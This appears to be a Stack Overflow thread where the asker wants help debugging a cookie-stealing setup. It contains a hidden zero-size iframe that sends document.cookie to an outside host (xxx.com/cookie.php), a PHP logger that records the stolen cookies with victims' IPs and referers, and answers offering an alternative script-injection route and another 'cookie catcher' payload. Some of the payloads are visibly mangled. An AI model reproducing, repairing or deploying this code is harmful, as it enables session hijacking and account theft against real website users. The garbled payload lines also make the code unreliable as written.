# Passing document.cookie to php from within an iframe on a seperate domain

Tags: php, javascript, parameters

```
<IFRAME WIDTH=0 HEIGHT=0 frameborder=0 SRC=jvoid(document.location="http://www.xxx.com/cookie.php?c"+document.cookie)></iframe>
```

And then the php file:

```
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('logs.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'< br > IP: ' .$ip. '< br > Date and Time: ' .$date. '< br > Referer: '.$referer.'< br > < br > < br >');
fclose($fp);
header ("Location: http://www.xxx.com");
?>
```

`logs.html` records everything other than the cookie- why? I tested that my site is dispaying cookies correctly by invoking: document.cookie within  tags so something else is up.
Please point out my stupidness!

Answer (score 0):

I think it's because of the same origin policy.

Otherwise it would be just too easy to steal someone's cookie :)

http://en.wikipedia.org/wiki/Same_origin_policy

Comment: There is no CORS violation. This is _exactly_ how you steal someone's cookie.

Comment: Note that `document.cookie` is passed as part of the query string.

Answer (score 0):

why would you want to do this? Anyways I had run into this link: http://www.15seconds.com/issue/971108.htm long back.. see if its useful to you

or you can try this using js as follows:

```
<script type="text/javascript">
   var script=document.createElement('script');
   script.setAttribute("type","text/javascript");
   script.setAttribute("src", 'http://xxx.com/ajaxHandler?getCookie&callback=passCookie');
   document.getElementsByTagName("head")[0].appendChild(newfile);
 </script>
```

And the page xxx.com/ajaxHandler?getCookie could do this:

```
 passCookie({'name':'mycookie', 'value':'myvalue'});
```

Answer (score -1):

```
< ="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookie catcher.PHP?c=' document.cookie)></
```

Comment: Welcome to Stack Overflow! Please read [answer] and [edit] your answer to contain an explanation as to why this code would actually solve the problem at hand. Always remember that you're not only solving the problem, but are also educating the OP and any future readers of this post.